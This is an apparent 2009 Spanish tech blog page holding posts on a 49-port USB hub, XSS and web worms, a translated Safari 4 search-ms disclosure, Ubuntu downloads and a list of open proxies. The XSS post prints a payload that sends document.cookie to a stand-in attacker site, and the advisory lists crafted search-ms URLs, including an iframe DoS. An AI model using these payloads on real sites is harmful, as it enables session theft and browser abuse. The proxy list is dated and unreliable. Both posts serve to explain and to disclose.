Curioso hub USB de 49 puertos

30 mayo 2009 Publicado por cLimbo 1 comentarios
A día de hoy disponemos de multitud de dispositivos USB, entre pendrives, discos duros, periféricos varios, gadgets, solemos tener ocupados la mayoría de puertos del equipo. De la mano de Cambrionix llega un HUB USB que integra nada menos que 49 puertos, lo que evitará cualquier problema de conectividad.

Evidentemente un dispositivo así no está pensado para uso doméstico. Se trata de una placa con una matriz de 7 x 7 conectores USB hembra. Cada puerto puede ofrecer 500 mA, por lo que se recomienda el uso de una fuente de alimentación que sea capaz de aportar 28 A de forma contínua por la línea de 5 V DC.

Puede ser utilizado como un sistema de prueba de dispositivos USB así como para la programación/grabación de todos ellos en paralelo. También puede ser utilizado como un sistema de almacenamiento USB a larga escala, sólo tenemos que pensar que cada USB con un disco duro de 500 GB (autoalimentado) reúne 24,5 TB, y con discos duros USB de 2 TB se alcanzarían los 98 TB; informan desde la web de tecnología theinquierer.es.

Y ahora me surge a mí las siguientes preguntas: ¿ de verdad usaría alguien esos 49 puertos a la vez ? ¿ no bastaría con 10 simplemente ? ¿ hay que hacerlo todo a lo "ganso" ? sencillamente espectacular.

Que es un gusano web y cómo funciona

16 mayo 2009 Publicado por cLimbo 0 comentarios
Antiguamente, los gusanos eran códigos maliciosos, preparados para extenderse rápidamente de sistema en sistema, mediante las redes p2p, el envío automatizado por correo, etc. Los gusanos eran programas informáticos, que al ejecutarlos, utilizaban tu ordenador para extenderse a muchos mas sistemas, sin que tu vieses absolutamente nada.

En la actualidad, con la extrema popularidad e importancia que tiene el mundo web, los gusanos han ido evolucionando, de forma que ha nacido un nuevo tipo de gusano, que no infecta tu ordenador, ni es un programa compilado que debes descargar, sino que es un pequeño fragmento de código javascript, que infecta tu perfil en alguna web.

Todo empezó con los agujeros de seguridad de tipo Cross Site Scripting (XSS), un tipo de agujero de seguridad, al que no se le presta tanta atención como a otros que a priori parecen mas peligrosos, como los Sql Injection, o similares, pero que es tanto o mas peligroso.

Pero para entender los web worms, debemos empezar desde muy al principio, desde las bases de los ataques tipo XSS. Un ataque XSS persigue, normalmente, robar la cookie del visitante. La cookie es una pequeña porción de información, que sirve para que la página web, recuerde que te has autenticado correctamente, y no te pida la contraseña cada vez que quieres hacer una acción.

Para robar la cookie, los ataques XSS se sirven de código javascript, ya que el código javascript se ejecuta en el navegador, tiene acceso a las cookies del mismo, sin embargo, por seguridad, un código javascript solo puede ver las cookies del sitio web que hospeda ese código javascript.

Es decir, si yo visito www.ejemplo.com, y esta web me envía un javascript que accede a las cookies, este javascript no podrá ver mis cookies de otras páginas web.

Y es en esa protección, en la que reside el peligro del Cross Site Scripting; imaginemos una página web que te pregunta tu nombre al entrar, tu lo introduces, y te muestra por pantalla: Hola! . Si yo, en el nombre, introduzco:

*script*alert(document.cookie)*/script*


Mi código javascript, podrá acceder a las cookies de esa página web, ya que el código javascript, el navegador, lo recibe a través de la web que me ha preguntado mi nombre.

¿Cual es el peligro real de todo esto?

Veamos un ejemplo ficticio, pero posible…Imaginemos que gmail tiene un error de seguridad, y permite introducir código javascript en el cuerpo de un mail, yo podría escribirte un mail que contubiese el siguiente código:

*script*document.location.href=’www.paginamaligna.com/recogercookie.php?cookie=’+document.cookie;*/script*

Cuando tu abrieses el correo, el navegador te redirigiría hacía paginamaligna.com, pasándole por GET, tu cookie, a la cual hemos tenido acceso, ya que el javascript, para el navegador, procedía de gmail.

Una vez con tu cookie, borro mi cookie de gmail, y me pongo la tuya, ahora ya estoy autentificado en gmail, con tu nombre de usuario, y puedo leer tu correo.

Una vez entendido esto, entender los gusanos web (web worms) son fáciles de entender, imagina que yo estoy en una red social, y tengo un perfil público, en el cual hay un campo ‘intereses’, donde la gente pone lo que le gusta hacer. Si ese campo, permite introducir código HTML, sin filtrarlo, yo podría introducir:

*script*alert(document.cookie);*/script*

Y cuando alguien visitase mi perfil, se mostrase su cookie. Si ahora en lugar de un alert, introduzco un código, que hace un petición POST a la red social, y modifica el perfil de la victima, introduciendo en el campo intereses, el mismo código malicioso que yo tengo, cada persona que entre, se le modificará automáticamente su perfil, y cada persona que vea ese perfil modificado, modificará automaticamente el suyo, y así sucesivamente.

En unas horas, todos los perfiles de una red social pueden estar modificados, es decir, infectados con el código.

Además, este código podría enviarle las cookies al autor original del código, mediante una petición invisible a alguna web (usando un iframe invisible, por ejemplo), de forma que no solo ha infectado todos los perfiles, sino que tiene todas las cookies, de todo el mundo, en la web.

Aunque todo esto suene rocambolesco, es una realidad, y ha sucedido ya en muchas ocasiones, siendo quizás la mas famosa, la de samy, un código javascript que infecto millones de perfiles en myspace, mediante un agujero de tipo XSS.

Como siempre, para protegerse de estos ataques, lo mejor es utilizar noscript, para firefox.

  • Artículo realizado por: Jose Carlos Norte.

Ejecución automática de aplicaciones en Safari 4

12 mayo 2009 Publicado por cLimbo 0 comentarios
Traducción; climbo

###############################
Safari para windows lanza automáticamente archivos sin preguntar
Aviso: http://lostmon.blogspot.com/2009/05/safari-4-automatic-explorerexe-launch.html
Notificación a los vendedores:
###############################

###########
Descripción
############

La beta pública de Safari 4 (528,16) es vulnerable ya que es propensa a ejecutar aplicaciones sin preguntar.

en primer lugar mirad =>

http://msdn.microsoft.com/en-us/library/aa767914 (VS.85). aspx # app_reg
http://msdn.microsoft.com/en-us/library/aa767914 (VS.85). aspx # url_inv

En esta documentación justamente en "alerta de seguridad" dicen:


"Applications handling URL protocols must be robust
in the face of malicious data.
Because handler applications receive data from untrusted
sources, the URL and other parameter values passed to
the application may contain malicious data attempting to
exploit the handling application. For this reason, handling
applications that could initiate unwanted actions based on
external data must first confirm those actions with the user"

(Que resumiendo dice que actualmente no han encontrado un vector de ataque, y que hoy por hoy no representa una vuln en IE)

Echad un vistazo a cómo utilizar la búsqueda ms-manejador de protocolo:

http://msdn.microsoft.com/en-us/library/bb266520.aspx

y cómo mostrar los objetos de una ventana de línea de comandos:

http://www.codeproject.com/KB/system/ExplorerObjects.aspx

Con toda esta información el usuario puede componer un documento html que llame a la búsqueda "ms-manejador de protocolo" y el uso de su explorador en algunos objetos.

########
Pruebas
########

search-ms:query=microsoft&
search-ms:query=vacation&subquery=mydepartment.search-ms&
search-ms:query=seattle&crumb=kind:pics&
search-ms:query=seattle&crumb=folder:C:\MyFolder&

Si redactas un documento html con un iframe o un enlace que contenga alguna de estas búsquedas "ms url firefox", "google chrome", y "IE8" te llega a mostrar una advertencia. (Esto es correcto), pero si haces click en aceptar se te abrirá explorer.exe y ejecutará la búsqueda...

Si hacemos la misma prueba con Safari, este navegador, abre directamente el iframe o el enlace sin ningún tipo de símbolo o ninguna advertencia.

Si nos fijamos en la aplicación de este protocolo manejador, esperamos que el explorador nos muestre los objetos, ya que se puede componer una url "especial"que pueden contener objetos en el explorador concretamente en su "ubicación", usando el parámetro "track" es el parámetro para lanzar explorer.exe que puede buscar lo que sea en un determinado lugar de nuestra máquina.

por ejemplo:

search-ms:displayname=Search%20In%20Google.com&crumb=
location:%3A%3A{20D04FE0-3AEA-1069-A2D8-08002B30309D}
&stackedby=System.ItemTypeText&recurring:true

abre explorer.exe, cierra explorer.exe y tambien cierra el tab desde el que fue llamado

search-ms:displayname=Search%20In%20Google.com
&crumb=location:D%3A%5C&stackedby=System.ItemTypeText
&recurring:true

abre el explorador y explota la caja de búsqueda:

search-ms:displayname=%3D[]%20OR%20%3D%20OR%20%3D%20OR%20%3D&location:

displayname es el parámetro que se puede utilizar para suplantar la ubicación y mostrarla, por ejemplo, en este caso google.com (sus víctimas pueden creer que el navegador hace la búsqueda en google.com)

Si ponemos esta URL directamente en la barra de direcciones de Safari este navegador dice que no puede abrir esta URL porque que no conoce el programa asociado.

Pero si ponemos esta url en un iframe, safari no muestra ninguna advertencia y ejecuta esta url y busca dentro de los archivos de la víctima.

Si ponemos esta url a Firefox, muestra una advertencia, y si hacemos click en permitir, esta búsqueda se ejecuta, si pasamos la url en un enlace o en un iframe el resultado es el mismo.

Con Google Chrome si pasamos la url a la barra de direcciones, Chrome busca en google esta url (y no se ven afectados directamente) pero si ponemos la url en un iframe o en un enlace, muestra una advertencia, por lo tanto; se haría click en permitir y la búsqueda se ejecutaría.

En IE8 muestra una advertencia, pero la búsqueda no se ejecuta, porque este explorador es incorrecto, podemos ponerlos en otros exploradores y funcionan bien.

Cuando explorer.exe está activo, el proceso es llamado con el siguiente parámetro:

esta "inyección" se ejecuta a nivel de comandos => c:\windows\explorer.exe /separate,/idlist,%1,%L

He estado haciendo varias pruebas intentando tratar de obtener esta otra línea de comandos =>

c:\windows\explorer.exe /N,%windir%\system32,
/select,%windir%\system32\calc.exe

pero en este momento; no quiero dejar pasar esta línea de comandos en un iframe con la búsqueda ms-protocol.


¿Un usuario remoto puede recoger el resultado de esta búsqueda en modo local?

No, no conozco ningún modo de hacerlo, pero por ejemplo, podemos causar un DoS en el explorador simplemente creando un documento HTML con tres o cuatro iframes que exigen la búsqueda ms y puede causar la lentitud del PC o un abuso de búsqueda indexada o la petada de explorer.exe.

En un enlace con sólo poner el protocolo de búsqueda-ms: con tres o cuatro ventanas del explorador, puede causar un abuso de la memoria, y en algunos casos explorer.exe puede petar.

Yo suelo intercambiar algunos correos de MSRC (Microsoft) y la conclusión final que he sacado es: que creemos que en este momento esto no suponga una vulnerabilidad de la seguridad en IE8, ya que muestran la alerta, y no hemos encontrado un vector de ataque o alguna forma de eludir la restricciones en la aplicación búsqueda-ms para convertirlo en un acceso remoto o una ejecución remota de código.

Esta es la última respuesta de Microsoft:

#######################################

We have completed our investigation into this issue
and believe there is not a security issue here for
Microsoft to address. Our investigation has not shown
any method whereby a search-ms URL could either execute
arbitrary code or return search results to a third party.
Although additional search windows can be generated from
multiple iframe on a web page, this is a temporary DoS
condition. We can find no security issue with the search-ms
protocol itself. As such, this is not something MSRC would track.

Please let me know if you feel we have missed something
in our analysis. Otherwise, I will be closing the MSRC
case down. I do appreciate you taking the time to report
this to us and working with us throughout the investigation.
########################################

pero si recordamos que cuando llamamos a la búsqueda ms-protocolo en una página web se ejecuta lo siguiente:

c:\windows\explorer.exe /separate,/idlist,%1,%L

Ellos por el momento no la toman como una vulnerabilidad en IE pero creo que esta cuestión se debería de tener en cuenta...

###############€nd#####################

Thnx to estrella to be my ligth
Thnx to all Lostmon Team !!
Thnx The Microsoft Research Security Center
for their support. http://blogs.technet.com/msrc/
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

--------------------

thz Lost :-)




Ubuntu Jaunty. Descarga de SO

06 mayo 2009 Publicado por Anuska86 0 comentarios


Por fín, después de tiempo esperándola, ya ha salido la versión final de Ubuntu, Jaunty.

En la web www.ubuntu.com están disponibles las versiones Desktop Edition, Server Edition y Netbook Remix dan varias formas para conseguirlo, según la arquitectura de tu pc, y para qué esté destinado. Aqui os englobaré todos:


Enlace de descarga:

Desktop edition:

Ubuntu 9.04 desktop i386 (32 bits).
Ubuntu 9.04 desktop amd64 (64 bits).

Netbook remix:

Ubuntu 9.04 netbook remix i386.

Server edition:

Ubuntu Server edition i386 (32 bits).

Ubuntu server edition amd64 (64 bits).


Otro método es comprando el cd/dvd.

O pedirlo en la web.

Vídeo de instalación gracias a facilware.



Más información:

Página oficial
Etiquetas: , ,

Proxies iRC 3-05-09

03 mayo 2009 Publicado por cLimbo 0 comentarios
200.43.141.172:8080
94.81.89.180:3128
88.191.19.25:3128
210.6.123.123:8088
189.18.245.64:8080
59.120.9.108:3128
194.170.38.36:80
202.53.254.228:3128
85.15.233.1:8080
85.15.233.46:8080
85.15.233.48:8080
85.15.232.3:8080
210.6.41.171:8088
78.39.195.11:80
85.15.203.241:8080
200.96.157.243:80
217.198.113.35:3128
124.244.208.80:8088
77.238.224.77:8080
218.14.227.197:3128
189.11.251.66:3128
118.232.229.69:808
78.136.102.154:6588
187.4.86.72:8080
78.8.151.138:8080
163.15.64.8:3128
211.137.205.254:8008
222.88.242.189:3128
118.97.32.138:8080
187.9.120.99:3128
125.162.89.192:8080
118.98.160.74:3128
80.248.10.233:8000
60.12.190.108:8088
119.146.73.114:8080
118.98.161.18:8080
59.37.27.181:3128
118.98.176.130:3128
118.97.109.186:3128
60.218.99.18:8080
189.23.110.186:1080
80.248.10.233:8080
60.253.114.30:3128
118.98.184.162:8080
81.101.118.119:8000
81.181.157.98:3128
212.93.193.72:443
212.93.193.78:443
212.93.193.74:443
118.98.184.162:80
212.93.193.82:443
8.7.26.27:3129
210.210.111.125:3128
212.93.193.83:443
219.138.254.109:8088
118.98.164.138:3128
200.143.129.100:8080
87.226.120.67:1111
200.143.130.37:3128
81.181.157.99:3128
12.47.164.114:8888
201.65.136.10:3128
61.238.104.200:808
125.41.181.59:8080
213.185.116.152:8080
201.93.145.126:6588
200.210.59.130:3128
196.211.117.187:8080
91.148.153.5:3128
189.51.253.35:8080
200.21.53.154:8080
125.7.221.146:8080
218.94.136.165:3128
119.70.40.108:8080
150.176.182.32:80
62.176.173.65:3128